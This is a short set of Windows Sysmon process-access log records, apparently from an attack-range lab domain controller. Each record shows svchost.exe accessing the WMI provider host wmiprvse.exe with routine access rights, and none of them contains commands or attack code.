{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:34.969\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:34.969","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
